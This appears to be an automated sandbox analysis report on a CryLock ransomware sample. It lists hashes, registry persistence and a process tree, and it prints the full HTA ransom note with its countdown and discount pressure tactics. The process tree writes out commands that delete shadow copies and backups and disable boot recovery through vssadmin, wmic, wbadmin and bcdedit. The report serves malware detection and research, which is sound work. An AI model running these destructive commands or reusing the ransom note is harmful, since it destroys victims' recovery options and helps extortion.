Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20231215-en locale:en-us os:windows10-2004-x64 system -
submitted
31-12-2023 08:32
Behavioral task
behavioral1
Sample
2f2d4eb24662c916f822f9c3fd55c9b2.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
2f2d4eb24662c916f822f9c3fd55c9b2.exe
Resource
win10v2004-20231215-en
General
-
Target
2f2d4eb24662c916f822f9c3fd55c9b2.exe
-
Size
206KB
-
MD5
2f2d4eb24662c916f822f9c3fd55c9b2
-
SHA1
9d5bda347f70b8f928803a28782a1018d9f2d0e0
-
SHA256
4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba
-
SHA512
1cc68736ac883a60f1113f183fa68b344b86dffc6b3853dbabbc626eb02fd69b9eb3801891c07193ab3684419e7346d4a1d0c37a5de6523df0dabae1b0051bb5
-
SSDEEP
3072:0bOTRwYckApvw14pcODvX/kyeAYcWNzs2C3Zm4YSYoj1ZYJJCpdXfabI8AKgcJuU:wOsZiKRJWWY1dJJQdHrYuFC
Malware Config
Extracted
crylock
- emails
-
ransomnote
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var max_discount = 50; var start_date = new Date('<%START_DATETIME%>'); var discount_date = new Date('<%DOUBLE_DATETIME%>'); var end_date = new Date('<%UNDECRYPT_DATETIME%>'); var main_contact = '<%MAIN_CONTACT%>'; var hid = '[<%HID%>]'; var second_contact = '<%RESERVE_CONTACT%>'; var sd = end_date; var dn = new Date(); var zoc, ddGlobal; function document.onblur() { alert('Attention! This important information for you!'); } function setContacts() { document.getElementById('main_contact').innerHTML = main_contact; document.getElementById('second_contact').innerHTML = second_contact; document.getElementById('hid').innerHTML = hid; } function countDiscount() { var term_current = new Date().getTime() - start_date.getTime(); var term_full = discount_date.getTime() - start_date.getTime(); var delta = discount_date.getTime() - new Date().getTime(); delta = new Date(delta); var dt = document.getElementById('pwr'); var timer_discount = document.getElementById('timer_discount'); var discount = document.getElementById('discount'); var hours_to_end = Math.floor(term_full / 1000 / 3600); var hours_current = Math.floor(term_current / 1000 / 3600); if (discount_date.getTime() > dn.getTime()) { var disc_per_hour = parseFloat(max_discount / hours_to_end).toFixed(2); var cur_discount = Math.floor(max_discount - (disc_per_hour * hours_current)); if (discount) { discount.innerHTML = cur_discount + '% discount'; } } if (cur_discount <= 25) { dt.style.cssText = 'border: 1px solid #FFC000;'; if 
(timer_discount) { timer_discount.style.background = '#FFC000'; } } if (sd.getTime() < dn.getTime() || cur_discount < 5) { dt.style.cssText = 'border: 1px solid #F53636; background-color: #F53636; padding: 16px 20px;'; dt.innerHTML = '<div style="font-size: 16px; color: #ffffff; text-align: center; display: block; font-weight: bold;">Decryption key can be bought at standard cost.</div><div style="font-size: 13px; color: #fff; text-align: center; margin-top: 10px">You need to hurry up to decrypt your data because all your files will be destroyed soon.</div>'; } var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } if (timer_discount) { timer_discount.innerHTML = dd + ' ' + hh+':'+mm+':'+ss; } } function ChangeTime() { var sd = end_date; var dn = new Date(); if (sd.getTime() < dn.getTime()) { var dt = document.getElementById('lctw'); dt.innerHTML = '<b>Soon, you won\'t be able to decrypt your files. 
Contact us immediately!</b>'; dt.style.cssText = 'background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px; text-align: center; font-size: 20px;'; zoc = 2; } else { var delta = sd.getTime() - dn.getTime(); delta = new Date(delta); var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); ddGlobal = parseInt(dd); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt = document.getElementById('file_lost'); if (dt) { dt.innerHTML= dd+' '+hh+':'+mm+':'+ss; } } } var count = 100, interval = 10, intervalID; function blink() { if (ddGlobal == 0 && zoc != 2) { var dt = document.getElementById('file_lost'); var dt2 = document.getElementById('text_file_lost'); var test = document.getElementById('test'); if (count == 100) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count - 2; if (count == 20) clearInterval(intervalId); }, interval); } if (count == 20) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count + 2; if (count == 100) clearInterval(intervalId); }, interval); } } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { var dt=document.getElementById('rc'); var xx=''; var i=0; while (i < 40) { xx=xx+getRandomArbitrary(0,2); i=i+1; } rc.innerHTML= xx; } function Start() { window.resizeTo(850,720); setContacts(); ChangeTime(); setInterval(ChangeTime, 1000); countDiscount(); setInterval(countDiscount, 1000); setInterval(blink, 100); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } 
function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background: #000; font: 12px 'Arial', sans-serif; padding: 0; margin: 0;" onload="Start();"> <div style="height: 100%; position: absolute; top: 0; left: 0; background-color: #ffffff; box-sizing: border-box; padding: 20px; overflow-x: hidden;overflow-y: hidden;"> <div style="background-color: #000000; width: 100%; height: 55px;" id="header"> <div style="color: #F53636; font-weight: bold; font-size: 40px; text-transform: uppercase; line-height: 54px; padding-left: 8px; float: left;">ENCRYPTED</div> <div style="font-size: 18px; color: #7E7E7E; float: right; line-height: 55px; padding-right: 17px;" id="rc">11100001111011111111100001111011111100</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> <div> <div style="float: left; width: 144px; height: 110px; background-color: #000000; color: #ffffff; text-align: center; line-height: 1;"> <b style="display: block; font-size: 43px; margin-top: 24px;">What</b> <b style="display: block; font-size: 20px;">happened?</b> </div> <div style="float: right; width: 630px;"> <b style="font-size: 13px; color: #F53636;">All your documents, databases, backups, and other critical files were encrypted.</b> <div>Our software used the AES cryptographic algorithm (you can find related information in Wikipedia).</div> <br> <div>It happened because of security problems on your server, and you cannot use any of these files anymore. The only way to recover your data is to buy a decryption key from us. 
</div> <br> <div>To do this, please send your unique ID to the contacts below.</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> </div> <div> <div style="float: left; width: 540px;"> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(main_contact)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">E-mail:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="main_contact"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(hid)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">Unique ID:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="hid"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="margin-top: 17px; line-height: 18px;">Right after payment, we will send you a specific decoding software that will decrypt all of your files. 
If you have not received the response within 24 hours, please contact us by e-mail <span style="text-decoration: underline;" OnClick="copytext(second_contact)" id="second_contact"></span>.</div> </div> <div style="float: right; width: 230px;"> <div style="border: 1px solid #2FAB61;" id="pwr"> <div style="padding: 13px 14px 3px 14px; text-align: center; font-size: 14px;">During a short period, you can buy a decryption key with a </div> <div style="font-size: 25px; text-align: center; display: block; font-weight: bold;" id="discount">50% discount</div> <div id="timer_discount" style="margin-top: 10px; background-color: #219653; padding: 5px 0; text-align: center; font-size: 25px; font-weight: bold; color: #ffffff;">--:--:-- left</div> </div> <div style="margin-top: 17px; line-height: 18px;">The price depends on how soon you will contact us.</div> </div> <div style="clear: both; float: none;"></div> </div> <div style="background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px" id="lctw"> <div style="float: left; font-size: 20px; padding-top: 3px;" id="text_file_lost">All your files will be deleted permanently in:</div> <div style="float: right; font-size: 25px;" id="file_lost"></div> <div style="clear: both; float: none;"></div> </div> <div> <div style="float: left; width: 540px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">Attention! 
<div id="test"></div></b> <ul style="list-style: none; padding: 0; margin: 0;"> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not try to recover files yourself.</span> this process can damage your data and recovery will become impossible.</li> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not waste time trying to find the solution on the Internet.</span> The longer you wait, the higher will become the decryption key price.</li> <li style="position: relative; padding-left: 20px; font-size: 12px margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not contact any intermediaries.</span> They will buy the key from us and sell it to you at a higher price.</li> </ul> </div> <div style="float: right; width: 230px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">What guarantees do you have?</b> <div>Before payment, we can decrypt three files for free. The total file size should be less than 5MB (before archiving), and the files should not contain any important information (databases, backups, large tables, etc.)</div> </div> <div style="clear: both; float: none;"></div> </div> </div> </body> </html>
Extracted
C:\$Recycle.Bin\S-1-5-21-768304381-2824894965-3840216961-1000\how_to_decrypt.hta
Signatures
-
Crylock
CryLock is a ransomware family that is a newer variant of the Cryakl ransomware.
-
Deletes shadow copies 2 TTPs
Ransomware often deletes backup files and shadow copies to inhibit system recovery; in this run that is done through the vssadmin, wmic and wbadmin commands visible in the process tree below.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely used as a geofence check.
Processes:
Process: 2f2d4eb24662c916f822f9c3fd55c9b2.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | 2f2d4eb24662c916f822f9c3fd55c9b2.exe
-
Drops startup file 1 IoCs
Processes:
Process: 2f2d4eb24662c916f822f9c3fd55c9b2.exe
description | ioc | process
File created | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\how_to_decrypt.hta | 2f2d4eb24662c916f822f9c3fd55c9b2.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials and other sensitive information.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Process: 2f2d4eb24662c916f822f9c3fd55c9b2.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7A47E0D5-4C965BDC = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2f2d4eb24662c916f822f9c3fd55c9b2.exe\" -id \"7A47E0D5-4C965BDC\" -wid \"vis\"" | 2f2d4eb24662c916f822f9c3fd55c9b2.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\1287499 = "1287499" | 2f2d4eb24662c916f822f9c3fd55c9b2.exe
-
Creates a large number of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Drops desktop.ini file(s) 30 IoCs
Processes:
2f2d4eb24662c916f822f9c3fd55c9b2.exedescription ioc process File opened for modification \??\c:\users\admin\3d objects\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\documents\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\downloads\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\favorites\links\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\saved games\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\desktop\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\searches\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\default\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\libraries\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\f:\$recycle.bin\s-1-5-21-768304381-2824894965-3840216961-1000\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\downloads\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\favorites\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\onedrive\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\documents\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for 
modification \??\c:\users\public\videos\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\desktop\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\music\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\pictures\camera roll\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\pictures\saved pictures\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\links\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\music\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\videos\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\accountpictures\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\$recycle.bin\s-1-5-21-768304381-2824894965-3840216961-1000\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\contacts\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\pictures\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\pictures\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Process: 2f2d4eb24662c916f822f9c3fd55c9b2.exe
description | ioc | process
File opened (read-only) | \??\F: | 2f2d4eb24662c916f822f9c3fd55c9b2.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
2f2d4eb24662c916f822f9c3fd55c9b2.exepid process 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
WMIC.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 4748 WMIC.exe Token: SeSecurityPrivilege 4748 WMIC.exe Token: SeTakeOwnershipPrivilege 4748 WMIC.exe Token: SeLoadDriverPrivilege 4748 WMIC.exe Token: SeSystemProfilePrivilege 4748 WMIC.exe Token: SeSystemtimePrivilege 4748 WMIC.exe Token: SeProfSingleProcessPrivilege 4748 WMIC.exe Token: SeIncBasePriorityPrivilege 4748 WMIC.exe Token: SeCreatePagefilePrivilege 4748 WMIC.exe Token: SeBackupPrivilege 4748 WMIC.exe Token: SeRestorePrivilege 4748 WMIC.exe Token: SeShutdownPrivilege 4748 WMIC.exe Token: SeDebugPrivilege 4748 WMIC.exe Token: SeSystemEnvironmentPrivilege 4748 WMIC.exe Token: SeRemoteShutdownPrivilege 4748 WMIC.exe Token: SeUndockPrivilege 4748 WMIC.exe Token: SeManageVolumePrivilege 4748 WMIC.exe Token: 33 4748 WMIC.exe Token: 34 4748 WMIC.exe Token: 35 4748 WMIC.exe Token: 36 4748 WMIC.exe Token: SeIncreaseQuotaPrivilege 4748 WMIC.exe Token: SeSecurityPrivilege 4748 WMIC.exe Token: SeTakeOwnershipPrivilege 4748 WMIC.exe Token: SeLoadDriverPrivilege 4748 WMIC.exe Token: SeSystemProfilePrivilege 4748 WMIC.exe Token: SeSystemtimePrivilege 4748 WMIC.exe Token: SeProfSingleProcessPrivilege 4748 WMIC.exe Token: SeIncBasePriorityPrivilege 4748 WMIC.exe Token: SeCreatePagefilePrivilege 4748 WMIC.exe Token: SeBackupPrivilege 4748 WMIC.exe Token: SeRestorePrivilege 4748 WMIC.exe Token: SeShutdownPrivilege 4748 WMIC.exe Token: SeDebugPrivilege 4748 WMIC.exe Token: SeSystemEnvironmentPrivilege 4748 WMIC.exe Token: SeRemoteShutdownPrivilege 4748 WMIC.exe Token: SeUndockPrivilege 4748 WMIC.exe Token: SeManageVolumePrivilege 4748 WMIC.exe Token: 33 4748 WMIC.exe Token: 34 4748 WMIC.exe Token: 35 4748 WMIC.exe Token: 36 4748 WMIC.exe Token: SeBackupPrivilege 4584 vssvc.exe Token: SeRestorePrivilege 4584 vssvc.exe Token: SeAuditPrivilege 4584 vssvc.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
2f2d4eb24662c916f822f9c3fd55c9b2.execmd.exedescription pid process target process PID 616 wrote to memory of 1484 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 1484 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 1484 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 4708 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 4708 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 4708 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 1744 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 1744 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 1744 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 456 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 456 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 456 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 2984 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 2984 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 2984 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 2480 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 2480 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 616 wrote to memory of 2480 616 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 456 wrote to memory of 4748 456 cmd.exe WMIC.exe PID 456 wrote to memory of 4748 456 cmd.exe WMIC.exe PID 456 wrote to memory of 4748 456 cmd.exe WMIC.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots; here it is reached through the `wmic SHADOWCOPY DELETE` command in the process tree, which is why WMIC.exe and vssvc.exe appear above with SeBackupPrivilege and SeRestorePrivilege enabled.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2.exe"C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"2⤵PID:2480
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"2⤵PID:2984
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE"2⤵
- Suspicious use of WriteProcessMemory
PID:456
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0"2⤵PID:1744
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"2⤵PID:4708
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet"2⤵PID:1484
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4584
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
930B
MD5 cd88b51760bc2a2fcca1a7f87bc11a72
SHA1 5d9c985f84b50e22ac8a73ebf84540a2fa9d1ed6
SHA256 2db0bb385d7c468f80f1d1b6c8d6b1014b250e5097dc33396f67bfc6c1bedbdd
SHA512 a2b2b19098923f14d34dce7a2a530009e3fb40594a5186bb69c483513d894733d36fd8457518c04d87bb57f10c9bb0c9a63c78872c2d0de7bdd3348e9ca1b4c3
-
Filesize
930B
MD5 0d8d289e6aa9da1068f6a094f69f1670
SHA1 d676ae6e30953ccaae2f483f5e36c02c64ea1d38
SHA256 903a4a7e28852f577936c73a4de1e51bf5df2c9124cb35d7492dd82cb86eec69
SHA512 368e55dacdc33ef1f7a66bd07b4506c9a3e8912d537e04a43812433a51d504ae3fd0eb28a8f6888f5a5e90a4b6c7556347dfb984237bc428ad78f486072515e9
-
Filesize
13KB
MD5 44a6b83020d4f25cafb6869295f44a3f
SHA1 489fed22d07835f0da1a7679ed7b8c54eb0aaf7d
SHA256 ffa114c0aea0138e2300ff7124d8e5354e1a5698484e47307c2fb58a345da16a
SHA512 c0ce0f7ddaef565d2cbb7425ec4208eb6973aa7c4e8e75526ad5ffdf279fead9fcfe559dee2865a65cedf27a43dc4f9c22145b3003a5b13c1d68daaa235523e3
-
Filesize
1KB
MD5 416251992c72a849afbef2ef6709a456
SHA1 372e1f25e14afb29082ed326f487a569d274ec95
SHA256 853327c74d2a4976199ccb5d583267237d3cf5913866e0bd4d6f07feb7656e3e
SHA512 7f0972ac78684cbced4a03bdb39bf74c1368eeda0ce3ef1d75aa4c63c72d85e0074a20a0e767e5ca43cdf2babcc21db51c336a489aa6123b5695ac2793b270b7
-
Filesize
4KB
MD5 2f56f45bfc6db4f5f7c1b5f304ea1a4b
SHA1 4d9cb4948f877afe1be85685cf5b4ba34662ab8b
SHA256 a85b6b4b39c0f45884243440387fd338518a6d9cd1e2bc5ee38575d113dc00ff
SHA512 54f550a0eb7e3393aba3c4a9fbaa25e825f05a5841e77a0a4a825f0d1756a48ada8350f19119899656466b7bddd115556906d5b9d39b12966247f9880b42a5cd